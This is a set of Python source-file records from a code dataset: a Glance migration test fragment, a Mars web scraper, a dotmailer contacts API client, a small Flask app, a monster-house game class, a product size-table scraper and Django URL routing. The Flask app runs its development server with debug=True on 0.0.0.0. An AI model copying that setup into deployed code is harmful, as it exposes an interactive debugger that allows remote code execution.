ModelsMigrationsSyncPostgres(ModelsMigrationSyncMixin,\n test_migrations.ModelsMigrationsSync,\n test_base.PostgreSQLOpportunisticTestCase):\n pass\n\n\nclass ModelsMigrationsSyncSQLite(ModelsMigrationSyncMixin,\n test_migrations.ModelsMigrationsSync,\n test_base.DbTestCase):\n 
pass\n","sub_path":"glance/tests/unit/test_migrations.py","file_name":"test_migrations.py","file_ext":"py","file_size_in_byte":78006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"284182654","text":"from splinter import Browser\nfrom bs4 import BeautifulSoup\nimport time\nimport pandas as pd\n\n\ndef init_browser():\n executable_path = {\n \"executable_path\": \"/Users/rober/Desktop/web-scraping-challenge/Missions_to_Mars/chromedriver\"}\n return Browser(\"chrome\", **executable_path, headless=False)\n\n\ndef scrape():\n time.sleep(1)\n browser = init_browser()\n url = \"https://mars.nasa.gov/news/\"\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, \"html.parser\")\n\n # stuff = soup.find_all('div', class_=\"content_title\").get_text()\n title = soup.find_all('div', class_=\"content_title\")[1].get_text()\n atext = soup.find('div', class_=\"article_teaser_body\").get_text()\n\n url2 = \"https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\"\n browser2 = init_browser()\n browser2.visit(url2)\n html2 = browser2.html\n soup2 = BeautifulSoup(html2, \"html\")\n\n featured_image_url = soup2.find(\"a\", class_=\"button fancybox\").get_text()\n\n url4 = \"https://space-facts.com/mars/\"\n\n tables = pd.read_html(url4)\n space_df = tables[0]\n space_df.columns = [\"0\", \"1\"]\n space_df\n\n hemisphere_image_urls = [\n {\"title\": \"Valles Marineris Hemisphere\",\n \"img_url\": \"https://astropedia.astrogeology.usgs.gov/download/Mars/Viking/valles_marineris_enhanced.tif/full.jpg\"},\n {\"title\": \"Cerberus Hemisphere\",\n \"img_url\": \"https://astropedia.astrogeology.usgs.gov/download/Mars/Viking/cerberus_enhanced.tif/full.jpg\"},\n {\"title\": \"Schiaparelli Hemisphere\",\n \"img_url\": \"https://astropedia.astrogeology.usgs.gov/download/Mars/Viking/schiaparelli_enhanced.tif/full.jpg\"},\n {\"title\": \"Syrtis Major Hemisphere\",\n \"img_url\": \"https://astropedia.astrogeology.usgs.gov/download/Mars/Viking/syrtis_major_enhanced.tif/full.jpg\"},\n ]\n\n listings = {\n # \"Test1\": stuff,\n \"Test2\": title,\n \"Test3\": atext,\n \"Test4\": featured_image_url,\n \"Test5\": space_df,\n \"Test6\": hemisphere_image_urls\n }\n return listings\n","sub_path":"Missions_to_Mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"342474205","text":"from dotmailer import Base\nfrom dotmailer.constants import constants\nfrom dotmailer.connection import connection\nfrom dotmailer.address_books import AddressBook\n\n\nclass ContactScore(Base):\n \"\"\"\n Scoring information about a specific contact.\n \n \"\"\"\n contact_id = None\n email = None\n date_modified = None\n score_label = None\n score = None\n engagement = None\n suitability = None\n\n def _update_values(self, data):\n # Attempt to convert strings to the appropriate data type for contact\n # scores.\n for key in ['contact_id', 'score', 'engagement', 'suitability']:\n if key in data and data[key] is not None:\n data[key] = int(data[key])\n data['date_modified'] = self.strptime(data['date_modified'])\n super(ContactScore, self)._update_values(data)\n\n\nclass Contact(Base):\n \"\"\"\n This class represents a DotMailer contact. To be able to create a \n contact, you must specify the email of the contact.\n \n ``Required keyword arguments``\n \n **email** - `A string containing the email address of the contact \n that you wish to add.`\n \n ``Optional keywoard arguments``\n \n **opt_in_type** - `A string which represents the type of optin \n that the contact performed. You can either specify these values \n by hand or use the pre-defined constant values.`\n \n * :class:`Constants`.CONTACT_OPTINTYPE_UNKNOWN\n * :class:`Constants`.CONTACT_OPTINTYPE_SINGLE\n * :class:`Constants`.CONTACT_OPTINTYPE_DOUBLE\n * :class:`Constants`.CONTACT_OPTINTYPE_VERIFIEDDOUBLE\n \n **email_type** - `A string representing the type of email that the \n contact would prefer to receive. This can be either plain text or \n HTML. Alternatively use the constant values.`\n \n * :class:`Constants`.CONTACT_EMAILTYPE_HTML\n * :class:`Constants`.CONTACT_EMAILTYPE_PLAIN\n \n **data_fields** - `A dictionary of values which any data fields \n and value that should be associated with the contact e.g`\n \n .. 
code-block:: python\n    \n        { \n            'FavouriteColour': 'Red', \n            'age': 23\n        }\n    \n    \"\"\"\n\n    end_point = '/v2/contacts'\n    email = None\n    opt_in_type = constants.CONTACT_OPTINTYPE_UNKNOWN\n    email_type = constants.CONTACT_EMAILTYPE_HTML\n    data_fields = None\n\n    def __init__(self, **kwargs):\n        self.required_fields = ['email']\n\n        # Reassign `delete` to reference the instance method rather\n        # than the class method version.\n        self.delete = self._delete\n        self.unsubscribe = self._unsubscribe\n\n        # Set up the other optional fields to the default value if they have\n        # not been specified.\n        if 'opt_in_type' not in kwargs:\n            kwargs['opt_in_type'] = constants.CONTACT_OPTINTYPE_UNKNOWN\n        if 'email_type' not in kwargs:\n            kwargs['email_type'] = constants.CONTACT_EMAILTYPE_HTML\n        if 'data_fields' not in kwargs:\n            kwargs['data_fields'] = None\n        super(Contact, self).__init__(**kwargs)\n\n    def __repr__(self):\n        return \"ID:{}, Email:{}, DataFields:{}\".format(\n            self.id,\n            self.email,\n            self.data_fields\n        )\n\n    def _update_values(self, data):\n        if 'data_fields' in data:\n            # If data_fields is a list then it is likely to be\n            # coming back from the server as a list of dictionaries,\n            # so we need to unpack them\n            if isinstance(data['data_fields'], list):\n                data['data_fields'] = {\n                    entry['key']: entry['value']\n                    for entry in data['data_fields']\n                }\n        super(Contact, self)._update_values(data)\n\n    def param_dict(self):\n        contact_data_fields = []\n        if self.data_fields is not None:\n            contact_data_fields = [\n                {'key': key, 'value': value}\n                for key, value in self.data_fields.items()\n            ]\n        return {\n            'Email': self.email,\n            'OptInType': self.opt_in_type,\n            'EmailType': self.email_type,\n            'DataFields': contact_data_fields\n        }\n\n    def create(self):\n        \"\"\"\n        Creates a contact\n\n        :return:\n        \"\"\"\n        response = connection.post(\n            self.end_point,\n            self.param_dict()\n        )\n        self._update_values(response)\n\n    def update(self):\n        \"\"\"\n        Updates an existing contact's data. Unlike DotMailer's API,\n        you currently can NOT create a contact by calling update with\n        an ID value of zero. If you need to create a contact\n        then please use the create method.\n\n        :return:\n        \"\"\"\n        self.validate_id('Sorry unable to update this contact as no ID value'\n                         ' has been defined.')\n        response = connection.put(\n            '{}/{}'.format(self.end_point, self.id),\n            self.param_dict()\n        )\n        self._update_values(response)\n\n    def _delete(self):\n        \"\"\"\n        Deletes an existing contact. 
When calling on an instance use \n        `instance.delete()`.\n\n        :return:\n        \"\"\"\n        self.validate_id('Sorry, unable to delete contact as no ID value is'\n                         ' defined for this contact.')\n\n        # Attempt to issue the delete request to DotMailer to remove the\n        # contact\n        type(self).delete(self.id)\n\n        # Clear the current ID value so we can't accidentally call this\n        # delete call multiple times\n        self.id = None\n\n    @classmethod\n    def delete(cls, id):\n        connection.delete(\n            '{}/{}'.format(cls.end_point, id)\n        )\n        return True\n\n    def add_to_address_book(self, address_book):\n        \"\"\"\n        Adds a contact to a specific address book\n\n        :param address_book: This should be an instance of :class:`AddressBook`\n        :return:\n        \"\"\"\n        address_book.add_contact(self)\n\n    def delete_from_address_book(self, address_book):\n        \"\"\"\n        Deletes a contact from a given address book\n\n        :param address_book:\n        :return:\n        \"\"\"\n        address_book.delete_contact(self)\n\n    @staticmethod\n    def delete_multiple_from_address_book(id_list, address_book):\n        \"\"\"\n        Deletes multiple contacts from an address book\n\n        :param id_list:\n        :param address_book:\n        :return:\n        \"\"\"\n        address_book.delete_multiple_contacts(id_list)\n\n    @staticmethod\n    def delete_all_from_address_book(address_book):\n        \"\"\"\n        Deletes all contacts from a given address book\n\n        :param address_book:\n        :return:\n        \"\"\"\n        address_book.delete_all_contacts()\n\n    @classmethod\n    def get_by_email(cls, email):\n        \"\"\"\n        Gets a contact by email address\n\n        :param email:\n        :return:\n        \"\"\"\n        response = connection.get(\n            cls.end_point + '/' + email\n        )\n        return cls(**response)\n\n    @classmethod\n    def get_by_id(cls, id):\n        \"\"\"\n        Gets a contact by ID\n\n        :param id:\n        :return:\n        \"\"\"\n        # TODO: Add some type checking in to make sure that the value supplied is actually an int\n        response = connection.get(\n            '{}/{}'.format(cls.end_point, id)\n        )\n        return cls(**response)\n\n    def get_address_books(self, select=1000, skip=0):\n        \"\"\"\n        Gets any address books that a contact is in\n\n        :param select:\n        :param skip:\n        :return:\n        \"\"\"\n        self.validate_id('Sorry, unable to get the address books that this'\n                         ' contact is in, due to no ID value being associated'\n                         ' with the contact.')\n\n        response = connection.get(\n            '{}/{}/address-books'.format(self.end_point, self.id),\n            query_params={'Select': select, 'Skip': skip}\n        )\n        return [AddressBook(**entry) for entry in response]\n\n    def get_all_address_books(self):\n        \"\"\"\n        Automatically performs all requests needed to return every possible\n        address book that this contact is associated with.\n\n        :return:\n        \"\"\"\n        all_address_books = []\n        select = 1000\n        skip = 0\n        address_books = self.get_address_books(select, skip)\n        num_of_entries = len(address_books)\n        while num_of_entries > 0:\n            all_address_books.extend(address_books)\n            if num_of_entries < select:\n                break\n            skip += select\n            address_books = self.get_address_books(select, skip)\n            num_of_entries = len(address_books)\n        return all_address_books\n\n    @classmethod\n    def get_multiple(cls, select=1000, skip=0):\n        \"\"\"\n        Gets a list of all contacts in the account\n\n        :param select:\n        :param skip:\n        :return:\n        \"\"\"\n        # TODO: Add some validation in for the parameter data types\n        response = connection.get(\n            cls.end_point,\n            query_params={'Select': select, 'Skip': skip}\n        )\n        return [cls(**entry) for entry in response]\n\n    @classmethod\n    def get_all(cls):\n        all_contacts = []\n        select = 1000\n        skip = 0\n        contacts = cls.get_multiple(select, skip)\n        num_of_entries = len(contacts)\n        while 
num_of_entries > 0:\n            all_contacts.extend(contacts)\n            if num_of_entries < select:\n                break\n            skip += select\n            contacts = cls.get_multiple(select, skip)\n            num_of_entries = len(contacts)\n        return all_contacts\n\n    @classmethod\n    def get_contacts_since(cls, date, with_full_data=True, select=1000, skip=0):\n        \"\"\"\n        Gets a list of contacts created after a specified date\n\n        :param date:\n        :param with_full_data:\n        :param select:\n        :param skip:\n        :return:\n        \"\"\"\n        response = connection.get(\n            '{}/created-since/{}'.format(\n                cls.end_point, date.strftime('%Y-%m-%d')\n            ),\n            query_params={\n                'WithFullData': with_full_data, 'Select': select, 'Skip': skip\n            }\n        )\n        return [cls(**entry) for entry in response]\n\n    @classmethod\n    def get_all_contacts_since(cls, date, with_full_data=True):\n        \"\"\"\n        Get all the contacts that have been created since a specific \n        date. \n        \n        This function will automatically handle making all the calls\n        required to get a complete list i.e. if there are more than\n        1000 contacts since the specified date.\n        \n        :param date: \n        :param with_full_data: \n        :return: \n        \"\"\"\n        select = 1000\n        skip = 0\n        all_contacts = []\n\n        contacts = cls.get_contacts_since(date, with_full_data, select, skip)\n        num_of_entries = len(contacts)\n        while num_of_entries > 0:\n            all_contacts.extend(contacts)\n            if num_of_entries < select:\n                break\n\n            skip += select\n            contacts = cls.get_contacts_since(\n                date, with_full_data, select, skip)\n            num_of_entries = len(contacts)\n\n        return all_contacts\n\n    @classmethod\n    def bulk_create(cls, filedata):\n        \"\"\"\n        Bulk creates, or bulk updates, contacts.\n        \n        This function allows you to upload a bulk number of contacts to \n        the server. The contact data must be in either a CSV or Excel\n        format, and it must include one column that is called 'Email' or\n        equivalent if your account is using a language other than \n        English. All other columns will be mapped to your custom contact\n        data fields.\n        \n        Currently DotMailer places a file upload limit of 10MB. If your\n        data is larger than this, then you will need to split it into\n        small chunks.\n        \n        The API will return an ID for the import, and the current status.\n        You can re-query the import status later, by using the unique\n        ID value.\n        \n        :param filedata: Either a file or filepath which can be read from \n        :return: \n        \"\"\"\n\n        url = '{}/import'.format(cls.end_point)\n\n        return connection.post(url, {}, files={'file': filedata})\n\n    # TODO: Since this uses a different end point, should we move this to the address-book class and just call into it from here?\n    @classmethod\n    def bulk_create_in_address_book(cls, address_book, filedata):\n        \"\"\"\n        Bulk creates, or bulk updates, contacts in an address book.\n        \n        Similar to the bulk create version, this function can be used to\n        create a bulk number of contacts in one go. However, this\n        version will also automatically associate the contact with the\n        address book that has been specified. The contact data must be \n        in either a CSV or Excel format, and it must include one column \n        that is called 'Email' or equivalent if your account is using a \n        language other than English. All other columns will be mapped \n        to your custom contact data fields.\n        \n        Currently DotMailer places a file upload limit of 10MB. 
If your\n        data is larger than this, then you will need to split it into\n        small chunks.\n        \n        The API will return an ID for the import, and the current status.\n        You can re-query the import status later, by using the unique\n        ID value.\n        \n        :param address_book: \n        :param filedata: \n        :return: \n        \"\"\"\n\n        url = '/v2/address-books/{}/contacts/import'.format(address_book.id)\n\n        return connection.post(url, {}, files={'file': filedata})\n\n    @classmethod\n    def get_contact_import_status(cls, id):\n        \"\"\"\n        Gets the import status of a previously started contact import.\n        \n        :param id: The bulk upload ID value returned when you submitted\n        a bulk upload request. The ID is a GUID and should look similar\n        to 842d81e8-c619-457f-bb77-ab6c4a17da39.\n        :return: A dictionary that contains the keys 'id' and 'status'.\n        \"\"\"\n        return connection.get(\n            '{}/imports/{}'.format(cls.end_point, id)\n        )\n\n    @classmethod\n    def get_contact_import_report(cls, id):\n        \"\"\"\n        Gets a report with statistics about what was successfully \n        imported, and what was unable to be imported.\n        \n        :param id: \n        :return: \n        \"\"\"\n        return connection.get(\n            '{}/import/{}/report'.format(cls.end_point, id)\n        )\n\n    @classmethod\n    def get_contact_import_report_faults(cls, id):\n        \"\"\"\n        Gets a report detailing the contacts that were unable to be\n        imported.\n\n        :param id:\n        :return:\n        \"\"\"\n\n        return connection.get(\n            '{}/import/{}/report-faults'.format(cls.end_point, id)\n        )\n\n    # TODO: Should this be a call into the address book object\n    @classmethod\n    def get_contacts_from_address_book(cls, address_book, with_full_data=True,\n                                       select=1000, skip=0):\n        response = connection.get(\n            '/v2/address-books/{}/contacts'.format(address_book.id),\n            query_params={\n                'withFullData': with_full_data, 'select': select, 'skip': skip\n            }\n        )\n        return [Contact(**entry) for entry in response]\n\n    # TODO: Should this be a call into the address book object\n    @classmethod\n    def get_all_contacts_from_address_book(cls, address_book,\n                                           with_full_data=True):\n        all_contacts = []\n        select = 1000\n        skip = 0\n        contacts = cls.get_contacts_from_address_book(\n            address_book, with_full_data, select, skip)\n        num_of_entries = len(contacts)\n        while num_of_entries > 0:\n            all_contacts.extend(contacts)\n            if num_of_entries < select:\n                break\n            skip += select\n            contacts = cls.get_contacts_from_address_book(\n                address_book, with_full_data, select, skip)\n            num_of_entries = len(contacts)\n        return all_contacts\n\n    # TODO: Should this be a call into the address book object\n    @classmethod\n    def get_modified_contacts_from_address_book_since(cls, address_book, date,\n                                                      with_full_data=True,\n                                                      select=1000, skip=0):\n        response = connection.get(\n            '/v2/address-books/{}/contacts/modified-since/{}'.format(\n                address_book.id, date.strftime('%Y-%m-%d')\n            ),\n            query_params={\n                'withFullData': with_full_data, 'select': select, 'skip': skip\n            }\n        )\n        return [Contact(**entry) for entry in response]\n\n    # TODO: Should this be a call into the address book object\n    @classmethod\n    def get_all_modified_contacts_from_address_book_since(cls, address_book,\n                                                          date,\n                                                          with_full_data=True):\n        all_contacts = []\n        select = 1000\n        skip = 0\n        contacts = cls.get_modified_contacts_from_address_book_since(\n            address_book, date, with_full_data, select, skip\n        )\n        num_of_entries = len(contacts)\n        while num_of_entries > 0:\n            all_contacts.extend(contacts)\n            if num_of_entries < select:\n                break\n            skip += select\n            contacts = cls.get_modified_contacts_from_address_book_since(\n                address_book, date, 
with_full_data, select, skip\n )\n num_of_entries = len(contacts)\n return all_contacts\n\n @classmethod\n def get_modified_contacts_since(cls, date, with_full_data=True, select=1000,\n skip=0):\n response = connection.get(\n '{}/modified-since/{}'.format(\n cls.end_point, date.strftime('%Y-%m-%d')\n ),\n query_params={\n 'withFullData': with_full_data, 'select': select, 'skip': skip\n }\n )\n return [Contact(**entry) for entry in response]\n\n @classmethod\n def get_all_modified_contacts_since(cls, date, with_full_data=True):\n all_contacts = []\n select = 1000\n skip = 0\n contacts = cls.get_modified_contacts_since(\n date, with_full_data, select, skip\n )\n num_of_entries = len(contacts)\n while num_of_entries > 0:\n all_contacts.extend(contacts)\n if num_of_entries < select:\n break\n skip += select\n contacts = cls.get_modified_contacts_since(\n date, with_full_data, select, skip\n )\n num_of_entries = len(contacts)\n return all_contacts\n\n # @classmethod\n # def get_suppressed_contacts_since(cls, date, select=1000, skip=0):\n # response = connection.get(\n # '{}/suppressed-since/{}'.format(\n # cls.end_point, date.strftime('%Y-%m-%d')\n # ),\n # query_params={\n # 'select': select, 'skip': skip\n # }\n # )\n # # TODO: Need to think how to handle these objects since they are nested with additional information\n # return [Contact(**entry) for entry in response]\n #\n # @classmethod\n # def get_all_suppressed_contacts_since(cls, date):\n # all_contacts = []\n # select = 1000\n # skip = 0\n # contacts = cls.get_suppressed_contacts_since(date, select, skip)\n # num_of_entries = len(contacts)\n # while num_of_entries > 0:\n # all_contacts.extend(contacts)\n # if num_of_entries < select:\n # break\n # skip += select\n # contacts = cls.get_suppressed_contacts_since(date, select, skip)\n # num_of_entries = len(contacts)\n # return all_contacts\n #\n # @classmethod\n # def get_unsubscribed_contacts_since(cls, date, select=1000, skip=0):\n # response = connection.get(\n # '{}/unsubscribed-since/{}'.format(\n # cls.end_point, date.strftime('%Y-%m-%d')\n # ),\n # query_params={\n # 'select': select, 'skip': skip\n # }\n # )\n # # TODO: Need to think how to handle these objects since they are nested with additional information\n # return [Contact(**entry) for entry in response]\n #\n # @classmethod\n # def get_all_unsubscribed_contacts_since(cls, date, select=1000, skip=0):\n # all_contacts = []\n # select = 1000\n # skip = 0\n # contacts = cls.get_unsubscribed_contacts_since(date, select, skip)\n # num_of_entries = len(contacts)\n # while num_of_entries > 0:\n # all_contacts.extend(contacts)\n # if num_of_entries < 0:\n # break\n # skip += select\n # contacts = cls.get_unsubscribed_contacts_since(date, select, skip)\n # num_of_entries = len(contacts)\n # return all_contacts\n #\n # @classmethod\n # def get_unsubscribed_contacts_from_address_book_since(cls, address_book,\n # date, select=1000,\n # skip=0):\n # response = connection.get(\n # '/v2/address-books/{}/contacts/unsubscribed-since/{}'.format(\n # address_book.id, date.strftime('%Y-%m-%d')\n # ),\n # query_params={\n # 'select': select, 'skip': skip\n # }\n # )\n # # TODO: Need to think how to handle these objects since they are nested with additional information\n # return [Contact(**entry) for entry in response]\n #\n # @classmethod\n # def get_all_unsubscribed_contacts_from_address_book_since(cls, address_book,\n # date):\n # all_contacts = []\n # select = 1000\n # skip = 0\n # contacts = 
cls.get_unsubscribed_contacts_from_address_book_since(\n    #         address_book, date, select, skip\n    #     )\n    #     num_of_entries = len(contacts)\n    #     while num_of_entries > 0:\n    #         all_contacts.extend(contacts)\n    #         if num_of_entries < select:\n    #             break\n    #         skip += select\n    #         contacts = cls.get_unsubscribed_contacts_from_address_book_since(\n    #             address_book, date, select, skip\n    #         )\n    #         num_of_entries = len(contacts)\n    #     return all_contacts\n\n    def _unsubscribe(self):\n        return type(self).unsubscribe(self.email)\n\n    @classmethod\n    def unsubscribe(cls, email):\n        \"\"\"\n        Unsubscribes a contact from the account\n        \n        :param email: \n        :return: \n        \"\"\"\n        return connection.post(\n            '{}/unsubscribe'.format(cls.end_point),\n            {\n                'Email': email\n            }\n        )\n\n    def _resubscribe(self, preferred_local=None,\n                     return_url_to_use_if_challenged=None):\n        contact, status = type(self).resubscribe(\n            self.email, preferred_local, return_url_to_use_if_challenged\n        )\n\n        # TODO: Look at a more dynamic way of this use __dict__ to pull out the variables that have been defined (excluding ID)\n        data = {\n            'email': contact.email,\n            'opt_in_type': contact.opt_in_type,\n            'email_type': contact.email_type,\n            'data_fields': contact.data_fields,\n            'status': contact.status\n        }\n        self._update_values(data)\n        return status\n\n    @classmethod\n    def resubscribe(cls, email, preferred_local=None,\n                    return_url_to_use_if_challenged=None):\n        payload = {\n            'UnsubscribedContact': {\n                'Email': email\n            }\n        }\n        if preferred_local is not None:\n            payload['PreferredLocale'] = preferred_local\n        if return_url_to_use_if_challenged is not None:\n            payload['ReturnUrlToUseIfChallenged'] = return_url_to_use_if_challenged\n\n        response = connection.post(\n            '{}/resubscribe'.format(cls.end_point),\n            payload\n        )\n        return Contact(**response['contact']), response['status']\n\n    # https://developer.dotmailer.com/docs/resubscribe-contact-to-address-book\n\n    @classmethod\n    def get_scoring(cls, select, skip):\n        \"\"\"\n        \n        :param select: \n        :param skip: \n        :return: \n        \"\"\"\n        response = connection.get(\n            '{}/score/'.format(cls.end_point),\n            query_params={\n                'Select': select, 'Skip': skip\n            }\n        )\n        return [ContactScore(**entry) for entry in response]\n\n    @classmethod\n    def get_all_scoring(cls):\n        \"\"\"\n        \n        :return: \n        \"\"\"\n        all_scoring = []\n        select = 1000\n        skip = 0\n        scorings = cls.get_scoring(select, skip)\n        num_of_entries = len(scorings)\n        while num_of_entries > 0:\n            all_scoring.extend(scorings)\n            if num_of_entries < select:\n                break\n            skip += select\n            scorings = cls.get_scoring(select, skip)\n            num_of_entries = len(scorings)\n        return all_scoring\n\n    @classmethod\n    def get_scoring_in_address_book(cls, address_book, select, skip):\n        \"\"\"\n        Gets contact scoring for contacts within a specific address \n        book or segment\n\n        :param address_book:\n        :param select: \n        :param skip: \n        :return: \n        \"\"\"\n        response = connection.get(\n            '/v2/address-books/{}/contacts/score/'.format(address_book.id),\n            query_params={\n                'Select': select, 'Skip': skip\n            }\n        )\n        return [ContactScore(**entry) for entry in response]\n\n    @classmethod\n    def get_all_scoring_in_address_book(cls, address_book):\n        all_scoring = []\n        select = 1000\n        skip = 0\n        scorings = cls.get_scoring_in_address_book(address_book, select, skip)\n        num_of_entries = len(scorings)\n        while num_of_entries > 0:\n            all_scoring.extend(scorings)\n            if num_of_entries < select:\n                break\n            skip += select\n            scorings = cls.get_scoring_in_address_book(\n                address_book, select, skip\n            )\n            num_of_entries = len(scorings)\n        return all_scoring\n\n    
@classmethod\n def get_scores_modified_since(cls, date, select, skip):\n response = connection.get(\n '{}/score/modified-since/{}'.format(\n cls.end_point, date.strftime('%Y-%m-%d')\n ),\n query_params={\n 'Select': select, 'Skip': skip\n }\n )\n return [ContactScore(**entry) for entry in response]\n\n @classmethod\n def get_all_scores_modified_since(cls, date):\n all_scoring = []\n select = 1000\n skip = 0\n scorings = cls.get_scores_modified_since(date, select, skip)\n num_of_entries = len(scorings)\n while num_of_entries > 0:\n all_scoring.extend(scorings)\n if num_of_entries < select:\n break\n skip += select\n scorings = cls.get_scores_modified_since(date, select, skip)\n num_of_entries = len(scorings)\n return all_scoring\n\n @classmethod\n def get_score_by_email(cls, email):\n \"\"\"\n Gets contact scoring for a contact by email address\n\n :param email: \n :return: \n \"\"\"\n response = connection.get(\n '{}/{}/score'.format(cls.end_point, email)\n )\n return ContactScore(**response)\n\n @classmethod\n def get_score_by_id(cls, id):\n \"\"\"\n Gets contact scoring for a contact by ID\n \n :param id: \n :return: \n \"\"\"\n response = connection.get(\n '{}/{}/score'.format(cls.end_point, id)\n )\n return ContactScore(**response)\n","sub_path":"dotmailer/contacts.py","file_name":"contacts.py","file_ext":"py","file_size_in_byte":28411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
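Nearly every `get_all_*` helper in the `contacts.py` record above repeats the same select/skip pagination loop. A minimal sketch of that idiom as a standalone helper; the `paginate` name and the fake page source are illustrative, not part of the dotmailer package:

```python
def paginate(fetch_page, select=1000):
    """Collect every record from a select/skip paginated endpoint.

    `fetch_page` is any callable accepting (select, skip) and returning
    a list; a page shorter than `select` signals the final page.
    """
    results, skip = [], 0
    while True:
        page = fetch_page(select, skip)
        results.extend(page)
        if len(page) < select:
            return results
        skip += select


# Exercise the helper against a fake three-page data source.
data = list(range(2500))
assert paginate(lambda select, skip: data[skip:skip + select]) == data
```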
+{"seq_id":"584284491","text":"from flask import Flask, request, jsonify,render_template\nfrom flask.logging import create_logger\nimport logging\n\n\napp = Flask(__name__)\nLOG = create_logger(app)\nLOG.setLevel(logging.INFO)\n\n@app.route(\"/\")\ndef home():\n return render_template('index.html')\n\nif __name__ == \"__main__\":\n\n app.run(host='0.0.0.0', port=80, debug=True) \n","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"337587816","text":"from random import *\n\nfrom candy_slayer.monster.Ghoul import Ghoul\nfrom candy_slayer.monster.Person import Person\nfrom candy_slayer.monster.Vampire import Vampire\nfrom candy_slayer.monster.Werewolf import Werewolf\nfrom candy_slayer.monster.Zombie import Zombie\nfrom candy_slayer.observed.Observer import Observer\nfrom candy_slayer.observed.Observable import Observable\n\n\nclass Home(Observer):\n \"\"\"A home filled with monsters.\"\"\"\n def __init__(self, manager):\n \"\"\"\n Initialize monsters inside the house.\n\n :param manager: game manager class\n \"\"\"\n self.observable = Observable()\n self.observable.register(manager)\n self.monsters = [self.numb_to_monster(randint(1, 5)) for i in range(randint(1, 10))]\n\n def get_monsters(self):\n \"\"\"\n Getter for the monsters inside the house.\n\n :return: the list of monsters inside the house.\n \"\"\"\n return self.monsters\n\n def get_population(self):\n \"\"\"\n Give the population of the house.\n\n :return: the integer value of the population of monsters in the house.\n \"\"\"\n self.population = 0\n for monster in self.monsters:\n if monster.get_name() != \"Person\":\n self.population += 1\n return self.population\n\n def update(self):\n \"\"\"Called when a monster dies so that it can turn into a person.\"\"\"\n for i, monster in enumerate(self.monsters):\n if monster.get_hp() < 1:\n self.monsters.pop(i)\n self.monsters.insert(i, Person(self))\n self.observable.update_observers()\n\n def numb_to_monster(self, x):\n \"\"\"\n Link a value to a monster object.\n\n :param x: random integer\n \"\"\"\n monster_val = {\n 1: Person(self),\n 2: Zombie(self),\n 3: Vampire(self),\n 4: Ghoul(self),\n 5: Werewolf(self),\n }\n return monster_val.get(x, Person(self))\n","sub_path":"candy_slayer/Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"304343213","text":"import settings.matrix as matrix\nfrom .productSizeTable import ProductSizeTable\nfrom settings.myError import NoSizeTableError\n\n\nclass ProductSize(ProductSizeTable):\n\n def get_size_info(self, product_id):\n print('Get size from size_table')\n # 그냥 일단 전부 가져와서 2차원배열로 만들자\n\n # 테이블을 전부 찾아논다\n t_heads = self.ch.driver.find_elements_by_xpath(self.xpath_info.t_head_xpath)\n t_bodies = self.ch.driver.find_elements_by_xpath(self.xpath_info.t_body_xpath)\n\n num = len(t_heads)\n if num == 0:\n raise NoSizeTableError\n\n # 첫번째 사이즈표부터 채우고 다시 size_table 을 리셋한다.\n for i in range(num):\n\n # 사이즈표를 채운다\n self.fill_table(t_heads[i], t_bodies[i])\n\n # 테이블을 확인 후 필요하면 전치\n try:\n self.conf_n_trans()\n except IndexError:\n self.fill_err_product('size_error', self.url, product_id, 'Is not matrix')\n finally:\n # 테이블 가공 후에 디비에 저장\n self.cut_n_insert(product_id, i)\n # 사이즈표 리셋 : 다음 사이즈표를 위해서\n del self.size_table[:]\n return\n\n def conf_n_trans(self):\n # 확인 작업 & 전치 필요하면 전치시킨다\n try:\n if not matrix.confirm_matrix(self.size_table):\n pass\n # raise IndexError\n finally:\n if self.xpath_info.need_trans:\n self.size_table = matrix.transpose_matrix(self.size_table)\n return\n\n def cut_n_insert(self, product_id, i):\n # 확인해서 문제가 있어도, 임의처리해서 디비에 넣긴 하자.\n col = ['product_id', 'dsc_idx', 'bulk']\n # DB 에 넣기 위해 column, value 맞춰주기\n self.cut_table(col)\n # DB 에 넣기\n self.insert_2_db(product_id, i + 1, col)\n return\n\n def insert_2_db(self, product_id, idx, col):\n # DB 에 넣기\n for row in self.size_table:\n val = [product_id, idx]\n val.extend(row)\n # print(f'{col}: {val}')\n self.db.insert_sub_data('size_info', col, val)\n return\n","sub_path":"common/product/productSize.py","file_name":"productSize.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"24333797","text":"from django.conf.urls import url,include\nfrom django.contrib import admin\nfrom . import views\nfrom django.shortcuts import redirect\nfrom registration.backends.simple.views import RegistrationView\n\n\n# Create a new class that redirects the user to the index page, if successful at logging\nclass MyRegistrationView(RegistrationView):\n def get_success_url(self, user):\n return '/'\n def form_valid(self, form):\n new_user = self.register(form)\n success_url = self.get_success_url(new_user)\n\n # success_url may be a simple string, or a tuple providing the\n # full argument set for redirect(). Attempting to unpack it\n # tells us which one it is.\n try:\n to, args, kwargs = success_url\n return redirect(to, *args, **kwargs)\n except ValueError:\n return redirect(success_url)\n\nurlpatterns = [\n url(r'^forum/', include('forum.urls')),\n url(r'^admin/', admin.site.urls),\n #Add in this url pattern to override the default pattern in accounts.\n url(r'^accounts/register/$', MyRegistrationView.as_view(), name='registration_register'),\n url(r'^accounts/', include('registration.backends.simple.urls')),\n url(r'^$', views.home, name='home'),\n]\n","sub_path":"qanda/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
